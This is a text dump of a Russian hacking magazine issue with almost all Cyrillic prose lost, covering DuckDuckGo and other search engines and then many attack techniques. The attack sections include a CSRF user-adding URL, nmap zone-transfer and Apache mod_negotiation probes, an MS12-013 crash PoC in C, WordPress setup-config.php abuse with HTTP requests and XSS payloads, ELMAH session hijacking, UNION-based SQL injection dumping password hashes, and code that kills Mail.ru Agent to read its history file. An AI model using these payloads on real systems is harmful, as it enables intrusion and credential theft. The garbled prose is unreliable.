G+ , Google . DuckDuckGo
,
Google
. ,
! , :
.
.

200 000 ,
1 000 000
,
(duckduckgo.com/traffic.html),
. 2011
DuckDuckGo
Linux Mint 12. , ,
Linux
.


Google .

DuckDuckGo ,
Google.

.
-, 7 000
$ .

,
.

.
,
.
:
Google . .
,
,
? http://donttrack.us
,
.
, Google
. ,
? 1 2012
. , Google

, ,
,
, ,
, -

SMS . ?
. Google
,

. Gmail
,
.

Google Docs.
DuckDuckGo IP-, , .
: DuckDuckGo

. . duckduckgo.com/privacy.html

, ,
,
.


,
,
, ,
, , .

goodies:
. DuckDuckGo: death date of lincoln (
),
Answer:
Saturday, April 15, 1865 (: , 15
, 1865).
, DuckDuckGo
,
?
goodies, goodies,
. ,

OpenStreetMap.

,

.
, area of china
( ) , :
3.705 million mi2 (square miles) (world rank:
4th), assuming china is a country (3.705 .
(4-
),
).
ID,
- (

Go!, ),

ISBN, ,
.
goodies .
heads or tails ( )
,
.
random number, roll die, random word
this or that or none.
roll
3d12 + 4.

DuckDuckGo
, . , ,
,
.
, SEO DuckDuckGo ,
.


.
DuckDuckGo
,
Yahoo! Search BOSS, Wikipedia, Wolfram Alpha
.

GOODIES

goodies
.
.
ip address
IP :).
IP ,

, , 64.207.122.151, DuckDuckGo
,
IP , :
64.207.122.151 is in: Cheyenne, Wyoming,
United States (82002).
goodies useragent, whois
, , ,
.
U+0153 : character
= 339: Latin small ligature oe; Unicode =
U+0153; Decimal = 339; HTML = &#339;.

password * strong passphrase
* words, * .
uuid, guid.


PC ZONE
, DuckDuckGo
Google
,
.
!bang.

.
, -
. ,
. !amazon
watch ( !a watch), amazon.com,
.
!youtube,
!twitter, !wikipedia, ,
. ,
: !g (google), !i (images), !yt
(youtube), !wiki .
bang ,
.

bang : duckduckgo.com/bang.html ( ).
. random
number ( ), perimeter
triangle 1.5 2 3.2 (
1.5, 2, 3.2), md5 this (
md5- this)
goodies.
,
goodies -, ( ). ,

Wolfram Alpha
.


, .

, ,

, , . Wolfram
Alpha, DuckDuckGo,
.
.

,
, HTTPS ,

DDG.

, .

.
,
. DuckDuckGo
:

DuckDuckGo. .

!bang. .

042

goodies.


Google .

. .
:
j ;
k ;
/ h ;
esc ;
t ;
m ;
1 ! !bang.
:
Enter l o
;
Ctrl/Cmd+Enter ;
d ( ).

. DuckDuckGo
http://ddg.gg (,
, 4 , google.com:),
SSL- https://duckduckgo.com.
Tor.
3g2upl4pq6kufc4m.onion.
DDG .
!proxy -

. DuckDuckGo (, ,
).

.
DuckDuckGo,

,

.
Android iOS
( ).

MultiSeeker (bit.ly/dhbIVF).
. (ye.gg/chatbot), XMPP
(Jabber).
,
im@ddg.gg. z

. ,
,
. donate

DuckDuckGo .
DuckDuckGo Perl JavaScript
YUI.

nginx,
FastCGI memcached, FreeBSD Ubuntu.
, Amazon
EC2.
PostgreSQL+bucardo, CDB, Solr, BerkelyDB, S3.
DuckDuckGo

GitHub
(github.com/duckduckgo).
?
.
:

, .
,
Duck Duck
Goose. ,
(Google it),
Duck it!
,
, ,
:).

10

DuckDuckGo
.



.
(MIT).
.
The Names Database
United Online 10 000 000
. DuckDuckGo
,

(, ,
).

Blekko (blekko.com)
2010 .
Blekko
, ,

.
. ,
/news

.
Blekko
15 000 000 .


YaCy (yacy.net)
YaCy P2P.

, Freeworld.

,
. ,
.
YaCy

.

Ixquick (ixquick.com)

Ixquick

. Ixquick,
DuckDuckGo, , . ,

Ixquick,
SSL-
( 2009 ).

Nigma (.)
. Nigma
,
.
,
Google, Yahoo, Bing, ,
Rambler, AltaVista, Aport.
,
.

043

/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK

,
! - ESEC
(goo.gl/zDJFT).
. ,

,
. , Windows
Server 2008 Microsoft Group Policy Preferences (GPP).
Windows Vista Windows 7 , XP
. , . , , , ,
ESEC, .
.
, .
Group
Policy Management (gpmc.msc). , Local Users and Groups Computer
Configuration .

.
.

044


EASY HACK

ESEC , , . .

SYSVOL- XML- c .
. , . :
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
        name="MyLocalUser"
        image="0"
        changed="2011-12-26 10:21:37"
        uid="{A5E3F388-299C-41D2-B937-DD5E638696FF}">
    <Properties action="C" fullName="" description=""
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
                changeLogon="0" noChange="0"
                neverExpires="0" acctDisabled="0"
                subAuthority=""
                userName="MyLocalUser" />
  </User>
</Groups>

. , ,
. -,
, AES 256,
, .

.
ESEC. (
), Microsoft
GP , GPP .
,
.

DNS ZONE TRANSFER

-
? ,

- , .

. DNS- ,
. ,
buhgal bank, , , . ,
admin.example.com.

DNS- (reverse),
DNS- IP-.
, ,
, IP-.
, DNS- , .
-, DNS Zone Transfer. , ,
DNS ,
. Zone
Transfer DNS-
, .
, , 53
DNS- TCP AXFR-.
,
nslookup,
Nmap.
nmap --script dns-zone-transfer.nse \
--script-args dns-zone-transfer.domain=<domain>

. , HD Moore. DNS- TLD (top-level-domain: .net,


.org, .xxx ) , -


Zone transfer .arpa

zone transfer. , 65 312 TLD


. , , .com
.ru, . 250 goo.gl/uVS1X.
:
1. nslookup.
2. DNS- : server 8.8.8.8.
3. : Set type=NS.
4. arpa
DNS-: arpa.
5. DNS- : server b.root-servers.net.
6. : ls -d arpa.
, arpa , , . , , .

045

/ EASY HACK

APACHE

,
- . Apache. , .
CMS, ,
, .
- , . .
,
, .
? . , ,
, . ?
, , ,
, . ,
, - ,
, , ,
php-, inc-. inc Apache
-
,
. . ,
? . DirBuster.
, .
. - Apache
mod_negotiation.
.
-, . , -
(), ,
. ,

foo.htm.en foo.htm.de, /foo.htm ,


Accept-Language.
MultiViews. ,
foo Apache foo.*,
.
MultiViews
Options MultiViews
. , ? (Stefano Di Paola, goo.gl/ly8HK):
. ? . 2007
, Accept
mod_negotiation
,
. , foo , Accept,
:

GET /foo HTTP/1.1
Accept: */*

HTTP/1.1 200 OK
Server: Apache/2.0.55
Content-Location: foo.php
Vary: negotiate,accept
TCN: choice

046


EASY HACK

A , Accept,
:

GET /foo HTTP/1.1
Accept: xxx/blabla

HTTP/1.1 406 Not Acceptable
Server: Apache/2.0.55
Alternates: {"foo.bak" 1 {type application/x-trash} {length 3}}, {"foo.php" 1 {type application/x-httpd-php} {length 3}}
Vary: negotiate,accept
TCN: list

? , ,
. , ,

, ,

. ,
- , (AddType).
.php~ , , .
, , Apache .
. ,
Apache.
,
( )
.
Metasploit (auxiliary/scanner/http/mod_negotiation_brute), , Acunetix . mod_negotiation
nmap:
nmap --script=http-apache-negotiation -p80 -sV


- CMS

. , - - ( ).
,
.
( https).
, , CSRF:
https://victim.com/admin.php?adduser=1&user=hacker&password=hacker

,
.
, - . ,

CSRF. . , .
https://victim.com/admin.php?adduser=1&user=hacker&password=hacker&token=long_random_bukva_cifra

, CSRF . ? , XSS. ,
(
). XSS .

, reflected XSS (
), stored XSS (
) . reflected
XSS. IE. /
.
, - ?
flash. . -,


( :). -,
.
flash
. evil.com
, victim.com .
evil.com, victim.com,
! , , .
? . same origin
policies. evil.com , victim.com , .
, ,
crossdomain.xml. , . victim.com.
, -
victim.com, victim.com/crossdomain.xml
,
.
. , ,
adobe goo.gl/A02R1.
:
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
  "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="*.victim.com" secure="false"/>
  <allow-access-from domain="www.microsoft.com"/>
</cross-domain-policy>

. ,
, allow-access-from, ,
. victim.com

047

/ EASY HACK
Microsoft. Master-only ,
crossdomain.xml, , ,
.
. , DNS NBNS-spoofing
victim.com , ,
. ,
victim.com.
secure (- true),
, c https. (false) victim.com Man-in-the-middle,
HTTP- . ,
https' .
.
-, - - ,
,
, , .
-, crossdomain.xml
, .
, - victim.com. -,
crossdomain.xml .

(
site-control master-only), -
. ,
victim.com,
xml.
,
<allow-access-from domain="*" />.
,
. ? . Alexa Top 50 000
- (goo.gl/rlCL1).

Silverlight Microsoft.
, . clientaccesspolicy.xml,
Silverlight , crossdomain.xml.
clientaccesspolicy.xml
(*)
http- https-. ,
xml.

COOKIES HTTPONLY

XSS
-. ,
. , XSS .
,
XSS .
document.cookie.
, -,
IE6. httpOnly.
, ,
javascript. , .
,
,
.
, httpOnly .
? cross-site tracing.
2003 , -
GET- POST- TRACE-. : -
, . :
XSS ,
TRACE,
.
(basic ntlm). , -
.

.
Apache. , 2.2 2.2.22. , TRACE,
-.
(Norman Hippert, goo.gl/ndGpv) ,
400 (HTTP 400 Bad Request)

048

Apache 2.2.

TRACE-. - , .

. ,
.
PoC :
javascript
.



(ivinside.blogspot.com)
(115612, . , .1)

,
.
...
050


MS12-013:
C (msvcrt.dll)

CVSSV2

9.3
(AV:N/AC:M/AU:N/C:C/I:C/A:C)

BRIEF

Msvcrt.dll (DLL) C,
. msvcrt.dll ,
,
.
.
, , ,
,
, ,
.
, , , ,
.
EXPLOIT

MS __check_float_string().
, C
MS Visual Studio,
VC/CRT/src/input.c.
__check_float_string() .

(_TCHAR floatstring[_CVTBUFSIZE + 1];). , . :
, .

calloc(), recalloc(). ,
MS12-013,
.
- msvcrt.dll:
.text:6FFBEA1E loc_6FFBEA1E: ; CODE XREF: sub_6FFBE9F3+25|j
.text:6FFBEA1E push 2
.text:6FFBEA20 push ebx ; mov ebx, [esi] in the entry block
.text:6FFBEA21 call __calloc_crt
.text:6FFBEA26 pop ecx
.text:6FFBEA27 pop ecx
.text:6FFBEA28 mov [edi], eax
.text:6FFBEA2A test eax, eax
.text:6FFBEA2C jz short loc_6FFBEA1A
.text:6FFBEA2E push [ebp+pulResult] ; size_t
.text:6FFBEA31 mov eax, [ebp+arg_8]
.text:6FFBEA34 push [ebp+arg_4] ; void *
.text:6FFBEA37 mov dword ptr [eax], 1
.text:6FFBEA3D push dword ptr [edi] ; void *
.text:6FFBEA3F call _memcpy
.text:6FFBEA44 mov eax, [esi]
.text:6FFBEA46 push esi ; pulResult
.text:6FFBEA47 add eax, eax ; !!!!
.text:6FFBEA49 push 2 ; int
.text:6FFBEA4B push eax ; int
.text:6FFBEA4C mov [esi], eax
.text:6FFBEA4E call ?SizeTMult@@YAJIIPAI@Z ; SizeTMult(uint,uint,uint *)
.text:6FFBEA53 add esp, 18h
.text:6FFBEA56 test eax, eax
.text:6FFBEA58 jge short loc_6FFBEA78

_ _calloc_crt()
SizeTMult(). _ _calloc_crt()
: __calloc_crt(Size, 2). ,
SizeTMult,
:
SizeTMult(Size*2, 2, &pResult)

,
Size*2,
Size*2*2. ,
- .
.
SizeTMult(). SizeTMult(Size, 2, &pResult).
MS add eax, eax:
.text:6FFBF935 push [ebp+pulResult] ; size_t
.text:6FFBF938 mov eax, [ebp+arg_8]
.text:6FFBF93B push [ebp+arg_4] ; void *
.text:6FFBF93E mov dword ptr [eax], 1
.text:6FFBF944 push dword ptr [esi] ; void *
.text:6FFBF946 call _memcpy
.text:6FFBF94B push edi ; pulResult
.text:6FFBF94C push 2 ; int
.text:6FFBF94E push dword ptr [edi] ; int
.text:6FFBF950 call ?SizeTMult@@YAJIIPAI@Z
; SizeTMult(uint,uint,uint *)
.text:6FFBF955 add esp, 18h

POC MS12-013:
#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/NODEFAULTLIB:msvcrt90.lib")
#pragma comment(linker, "/NODEFAULTLIB:msvcrt80.lib")
#pragma comment(lib, "vs6/msvcrt.lib")
#define BUF_SIZE 0x300
void main( void )
{
    char *pStr;
    float f;
    int i;

    pStr = (char*)malloc(BUF_SIZE);
    memset(pStr, 0, BUF_SIZE);
    strcpy(pStr, "1.");
    for( i=1; i<=BUF_SIZE-10; i++)
    {
        strcat(pStr, "0");
    }
    printf("Before scanf()\n");
    sscanf(pStr,"%f", &f);
    printf("After scanf()\n");
    printf("%f\n", f);
}

check_float_string CRT

TARGETS

Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008

SOLUTION

,
.

Adobe Flash Player:

MP4
SequenceParameterSetNALUnit

CVSSV2

10.0
(AV:N/AC:L/Au:N/C:C/I:C/A:C)

BRIEF

10 2012 metasploit- ,
mp4-, Flash10u.ocx Adobe Flash Player.
sequenceParameterSetNALUnit.
num_ref_frames_in_pic_order_cnt_cycle, , Flash

offset_for_ref_frame , . ,
Flash-.
, ITW.

EXPLOIT

( sub_1005B396), Flash10u.ocx
10.3.181.34:

.text:1005B482 call SubReadUExpGlomb ; pic_order_cnt_type
.text:1005B487 mov [esi+40h], eax
.text:1005B48A cmp eax, ebp ; pic_order_cnt_type != 0 (ebp=0)
.text:1005B48C jnz short loc_1005B49D
; ...
.text:1005B49D xor ebx, ebx
.text:1005B49F inc ebx
.text:1005B4A0 cmp eax, ebx
.text:1005B4A2 jnz short loc_1005B4EF ; pic_order_cnt_type != 1
.text:1005B4A4 mov ecx, edi
.text:1005B4A6 call SubReadBit ; delta_pic_order_always_zero_flag
.text:1005B4AB mov ecx, edi
.text:1005B4AD mov [esi+48h], al
.text:1005B4B0 call SubReadSExpGlomb ; offset_for_non_ref_pic
.text:1005B4B5 mov ecx, edi
.text:1005B4B7 mov [esi+54h], eax
.text:1005B4BA call SubReadSExpGlomb ; offset_for_non_ref_pic
.text:1005B4BF mov ecx, edi
.text:1005B4C1 mov [esi+50h], eax
.text:1005B4C4 call SubReadUExpGlomb ; num_ref_frames_in_pic_order_cnt_cycle
.text:1005B4C9 mov [esi+4Ch], eax
.text:1005B4CC test eax, eax
.text:1005B4CE jbe short loc_1005B4EF ; num_ref_frames_in_pic_order_cnt_cycle == 0
.text:1005B4D0 lea eax, [esi+58h]
.text:1005B4D3 mov [esp+10h+ptr], eax
.text:1005B4D7
.text:1005B4D7 loc_1005B4D7: ; CODE XREF: SubParseSeqParameterSet+157|j
.text:1005B4D7 mov ecx, edi
.text:1005B4D9 call SubReadSExpGlomb ; offset_for_ref_frame
.text:1005B4DE mov ecx, [esp+10h+ptr]
.text:1005B4E2 add [esp+10h+ptr], 4
.text:1005B4E7 inc ebp ; ebp -
.text:1005B4E8 mov [ecx], eax ; ecx
.text:1005B4EA cmp ebp, [esi+4Ch] ; c num_ref_frames_in_pic_order_cnt_cycle
.text:1005B4ED jb short loc_1005B4D7

SubReadUExpGlomb() .
SubReadSExpGlomb() . SubReadBit()
. ,
num_ref_frames_in_pic_order_cnt_
cycle. Flash Player
stack cookies,
eip - .
TARGETS

Adobe Flash Player <= 10.3.181.36


SOLUTION

10.3.183.5

WordPress

CVSSV2

7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)

, setup-config.php,

Claudius)
WordPress. - PHP-,
XSS-, MySQL.
EXPLOIT

1. PHP- XSS
setup-config.php.
WordPress MySQL.
MySQL.
MySQL
,
/ MySQL . WordPress PHP- WordPress. ,
WordPress
Javascript- ,
XSS.
. , A.B.C.D -
WordPress, W.X.Y.Z - MySQL.
POST- GET- WordPress :

BRIEF

Trustwave SpiderLabs
(Jonathan


POST-
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6;
rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480;
wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z
&prefix=wp_&submit=Submit
GET-
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480;
wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT

WordPress 404.php
( , ),
PHP-:
<?php
phpinfo();
?>

GET- :
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

XSS
,
:
UPDATE wp_comments SET
comment_content='<script>alert('123')</script>' where
comment_content='Hi, this is a comment.<br />To delete
a comment, just log in and view the post&#039;s
comments. There you will have the option to edit
or delete them.';

, GET, Javascript-:
GET /?p=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

2. XSS setup-config.php. Javascript-


dbname, dbhost uname.
POST-:
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&
uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit

3. MySQL
setup-config.php.
MySQL,
. , ,
MySQL, ,
. :
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
uname=user&pwd=pass&dbhost=L.M.N.O

L.M.N.O user pass.


TARGETS

WordPress 3.3.1 .
SOLUTION

- ,
WordPress
.

, . ,
WordPress ,
.

MySQL, WAF, , ModSecurity,
. z


(blog.chivavas.org)

ASP.NET:

DVD



Music
Store


ELMAH
,
,

,
, ,
. ELMAH
ASP.NET-.

Web- ELMAH



,
, , . , , ,
. -,
. (deadlock) :
,
. -, . ,

web-. : 99%,
, .
: -?
:
:
, ,
.
, ,
.
,
.



ELMAH ,
,
,

. 2007

web-,
ASP.NET. Web-
Trace.axd, ELAMH,

.

.
Rapid7.
, SQL-

(, ,
) , .
,
? , , , ,
, 80%
.

ELMAH?
ELMAH ( Error Logging Modules and
Handlers) , (Atif Aziz).
, ASP.NET.
(ELMAH 1.1 NuGet 11
2011 ),
.NET. , NuGet,
45 583 .
ELMAH . web-
:
NuGet ! , ELMAH ,
!
Web.config. .
, ELMAH :
,
RSS .


.
web- ASP.NET MVC
Music Store, .
CodePlex, ELMAH,

. web- Visual Studio IIS.
,
http://localhost/MusicStore.


,
ELMAH. Music Store
, Admin .
admin p@ssw0rd .
- .
ASP.NET MVC,
, 404, , . ? . ,
. web ELMAH, http://localhost/
MusicStore/elmah.axd. ,
, ELMAH, 404,
. ,
ELMAH. Details
. -, ELMAH
: ,
. ? .

, (
), ,
, . , ! ,
, , ,
-
. , ELMAH customErrors ASP.NET,
web-.

, customError on (),



ELMAH,
.
. ELMAH . , , , ,
, HTTP_COOKIE, HTTP_HOST,
HTTP_USER_AGENT .
HTTP_COOKIE AUTH_USER.
AUTH_USER ,
.
admin. HTTP_COOKIE . ,
.ASPXAUTH.
.
, ,

. ,
ASP.NET_SessionId.
. ,
- .

. :
.ASPXAUTH ASP.NET_SessionId .


. . ELMAH
. ,
.
. ,
. -, ELMAH
RSS.
http://localhost/MusicStore/elmah.axd/rss RSS
, :).
? . , -
( ELMAH).
: .
Music Store, 404.
, : http://localhost/MusicStore/Store/
Browse>aspx". , 400 ,
ELMAH. , . , , .
. web- ELMAH
.
- :

ELMAH Web.config


Music Store SQL-

ASP.NET_SessionId=3dljmclkhjpat52quopccijj;
.ASPXAUTH=CDB45013DD38AD7D2759BA6FAA7D98F07
...
B84C6CB5BCC76E7AE899690CC2016B5F1BCE9CDCBAA

.
Firefox Firebug Firecookie.
ASP.NET_SessionId ,
. .ASPXAUTH.
! , Admin
. ,
, ,
.


ELMAH
, .
SQL Injection Music Store.
Music
Store Microsoft . , . http://
localhost/MusicStore/Search. ,
. ,
SQL-, ,
. ELMAH, ,
. - "' or select 1 from abcdef".
, abcdef
( ). , .
, SQL-. ELMAH
:
System.Data.SqlClient.SqlException (0x80131904):
Incorrect syntax near the keyword 'select'.
Incorrect syntax near '%'.
Unclosed quotation mark after the character string ''.

? -,
SQL Server. -, .
.
, ELMAH ,
SQL-, .
Sql.
CSV,
http://localhost/MusicStore/elmah.axd/download,
Microsoft Excel .
. : "' or 1
= 1 --". ? . -


WWW
ELMAH
( ,
..):
code.google.com/p/
elmah.

NuGet: nuget.org.
web ASP.
NET MVC Music Store:
mvcmusicstore.
codeplex.com/.;
Firebug:
getfirebug.com.
Firecookie:
bit.ly/gMhx7B.
Visual Web Developer 2010 Express:
bit.ly/ldalNH.;
SQL Server 2008
Express:
bit.ly/AtJpCt.



ASP.NET (Trace.axd):
bit.ly/xaZzSn.

Web- ELMAH

,
.
Music Store, ASP.NET MVC SQL
Server, web- (
, .ASPXAUTH). ,
, ASP.NET,
2.0. , aspnet_Users aspnet_Membership.
, : "Hits'
and exists(select 1 from sys.tables where name = 'aspnet_
Users') --". .
.
( , ),
: .
:
select 1, u.UserName + ':' + m.Password + ':' +
m.PasswordSalt from dbo.aspnet_Users as u
inner join dbo.aspnet_Membership as m on u.UserId =
m.UserId

,
:
"' and 1 <> 1 union all select 1, u.UserName + ':' +
m.Password + ':' + m.PasswordSalt from dbo.aspnet_Users
as u inner join dbo.aspnet_Membership as m on u.UserId =
m.UserId --"

?
, ,
, , . ,

ELMAH, web-. ,
.
ELMAH
, ,
.


ASP.NET,
Web.config . web-,
:
1. ELMAH configuration/
system.web/httpHandlers configuration/system.webServer/
handlers Web.config;
2. configuration XML:
<location path="elmah.axd">
  <system.web>
    <httpHandlers>
      <add verb="POST,GET,HEAD" path="elmah.axd"
           type="Elmah.ErrorLogPageFactory, Elmah" />
    </httpHandlers>
    <authorization>
      <allow roles="Administrator" />
      <deny users="*" />
    </authorization>
  </system.web>
  <system.webServer>
    <handlers>
      <add name="Elmah" path="elmah.axd"
           verb="POST,GET,HEAD"
           type="Elmah.ErrorLogPageFactory, Elmah"
           preCondition="integratedMode" />
    </handlers>
  </system.webServer>
</location>

! c Administrator
ELMAH, , .

, ,

,
.
, , . z


Gar|k (garik@coru.ws)

u
.R
il
Ma


Mail.
Ru ,
,

.



21,4
.
,
.

,

.

WARNING

138
,

,
,


,

28

(.
272, 273, 274).

DVD


mra.dbs,
,


WinHex-,


2008 ,
Mail.ru .
*email*history.txt mra.dbs
(,
) .
, RTF-, .
. , ,
Mail.ru History Reader,
][ 2009 .
,
(. ) . Mail.ru ,
mra.dbs.
. SOLON7
HEX-, ,

Mail.ru . 2010
- .


MRA.DBS?
, , : , ,
mra.dbs, ? mra.dbs
%APPDATA%\Mra\Base\mra.dbs ( C:\Documents and Settings\user\Application Data\Mra\
Base\mra.dbs),
,
ExpandEnvironmentStrings CopyFile.
mra.dbs
. ,
, (
,
)
, . (, ,
)
(
). , .
ZwQuerySystemInformation
DuplicateHandle
. ,
ZwQueryInformationFile ,
. ( ) FileObject,
-.
,

, . ,
,
,
. , , .
,
FILE_READ_ATTRIBUTES ( ),
, (
) (
NTFS MFT).
, (
).
.
, Mail.ru , (ProcessID).
: ToolHelp API, Native API
( ZwQuerySystemInformation),

(GetWindowThreadProcessId).
ToolHelp API exe-.
CreateToolhelp32Snapshot >
Process32First > Process32Next,
szExeFile PROCESSENTRY32 c magent.
exe. ProcessID ,
th32ProcessID:
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if( INVALID_HANDLE_VALUE != hProcessSnap)
{
    pe32.dwSize = sizeof( PROCESSENTRY32 );
    if( Process32First( hProcessSnap, &pe32 ) )
    {
        do
        {
            if(0 == lstrcmp(pe32.szExeFile,_TEXT("magent.exe")))
            {
                pid=pe32.th32ProcessID;
                break;
            }
        }
        while(Process32Next( hProcessSnap, &pe32 ));
    }
    CloseHandle( hProcessSnap );
}

PID,
SeDebugPrivilege (OpenProcessToken >
LookupPrivilegeValue > AdjustTokenPrivileges)
(OpenProcess > TerminateProcess), CopyFile.
Native API:
void GetPrivilege(IN ULONG Privilege)
{
BOOLEAN OldValue;
RtlAdjustPrivilege(Privilege, TRUE, FALSE, &OldValue);
}

, mra.dbs . :).

MRA.DBS
mra.dbs Mail.ru ,

( ,
:), ,
.
-.
, mra.dbs -,
4- .
,
( ):
typedef struct _ids {
unsigned int id1;
unsigned int id2;
unsigned int count;
} _ids;


mrahistory_, e-mail mra.dbs
e-mail , . :
,
. ,
( _ids).


( ) (
):
struct _message
{
unsigned int size;
unsigned int prev_id;
unsigned int next_id;
unsigned int xz1;
FILETIME time;
unsigned int type_mesage;
char flag_incoming;
char byte[3];
unsigned int count_nick;
unsigned int magic_num; // 0x38
unsigned int count_message;
unsigned int xz2;
unsigned int size_lps_rtf;
unsigned int xz3;
};

,
, .
, 0x2C , , ,
.
:

( );
0x190
mrahistory_, , 0x24
.
, :

Unicode (wchar_t) :
;
LPS ( MMP),
;
RTF.
, . ,
-, ?
SOLON7
.


0x10 mra.dbs, , -.
-, . , ,
mra.dbs. . 0x20

DWORD * offset_table=(DWORD *)(mra_base +
    *(DWORD*)(mra_base + 0x10));
DWORD end_id_mail=*(DWORD*)(mra_base+0x20+
    offset_table[1]);
DWORD count_emails=*(DWORD*)(mra_base+0x2C+
    offset_table[1]);
...
for(int i=0;i<count_emails;i++)
{
    _ids *mail_data=(struct _ids*)(mra_base+
        offset_table[end_id_mail]+4);
    if(memmem(((unsigned char*)mail_data+0x190),
        mrahistory,...))
    {
        emails[k].id=(_ids*)((unsigned char*)mail_data+0x24);
        ...
    }
    end_id_mail=mail_data->id2;
}

, mra.dbs
. .
, mra.dbs ,

, .
Windows Memory Mapped
:

MRA.DBS

2 4 7 10 35 46


WWW

INFO


Mail.ru
5.4:
bit.ly/z2ETMY;
Mail.ru
History Reader:
bit.ly/xZoKvU;
:
c0dedgarik.blogspot.
com;
++
winhex.
pos-:
bit.ly/zsTJTb;


:
bit.ly/zNgQ2S;


:
bit.ly/w4upzS;


Visual
Studio:
bit.ly/w7sWNA.

-
,

,

.


,


,

.

CreateFile
CreateFileMap
MapViewOfFile
VirtualFree
CloseHandle
CloseHandle


, UnmapViewOfFile VirtualFree.
, , . emails:
typedef struct _emails{
wchar_t *email;
_ids *id;
};
...
struct _emails *emails;
...
emails=VirtualAlloc(0,count_emails*sizeof(struct _emails),..);

RICH TEXT FORMAT (RTF)


RTF, mra.dbs,
, 1982
Microsoft Adobe.
,
EM_STREAMIN SF_RTF
EM_STREAMOUT SF_TEXT :
EDITSTREAM es = { 0 };
es.pfnCallback = EditStreamCallback;
es.dwCookie = (DWORD_PTR)&lps;
SendMessage(hRich, EM_STREAMIN, SF_RTF, (LPARAM)&es);



mrahistory_ . ,
16*count_emails (, 1
000 ~15 ). ,

, :
int id_message=emails[k].id->id1;
for(int i=0;i<emails[k].id->count_messages;i++)
{
_message*mes=(_message*)(mra_base+
offset_table[id_message]);
wchar_t*str=(wchar_t*)((unsigned char*)mes+
sizeof(_message));
...
id_message=mes->prev_id;
}

FILETIME,

FileTimeToSystemTime. RTF
Rich Edit
WordPad. , ,
message. , ,
.

P.S.
,
,
. , (exe , , 2
) C-,
hex- .
,
ICQ-, mra.dbs.
Mail.Ru, -, Mail.Ru ,
-, , -,
, . z


Daeren Torn


WARNING


. ,



,

.


, .

.


. , .



,

. !

*****09 : -85 |
*****61 : -71 |
*****60 : 0 |

. 31 ,
. ,
,
( - ? . )?
Webmoney ,
, . ,
, html, .
, - :).

, . Epic fail.
, , ,
html- .
, input-:
m_from m_to. , ! :
ID? , : m_from,
, .
ID .
, .
! , , ,
, , . ,
-85 , 290!
( ), , . , ,
ID . , ! ,
. ,
, ,
.
.


?

Opera
disabled ( , ).
:

, .
, .

/ , ,
.
, . , ID.
:

*****09 :
*****61 :
*****60 :

<input type=button value='' name=show_orders_list


onClick='showPay(this.form, ***39)'>

15 |
-71 |
-100|



ID ,
: ID!
. ,
. ,
,
: , (.) .

, !
, , ? , . ID JS. ,
.
, ID
//
:).
.
, ,
Charles (charlesproxy.com ,
- ). , . IE
ieHTTPHeaders,
.
ieHTTPHeaders :
POST /client.php
xjxfun=changeChack&xjxargs[]=***18&xjxargs[]=***39&
xjxargs[]=120.0

: 1 , 2
, 3 .
GET-
. , . , ,
JS ? ,
}{0@): - -?
? !.

- ?
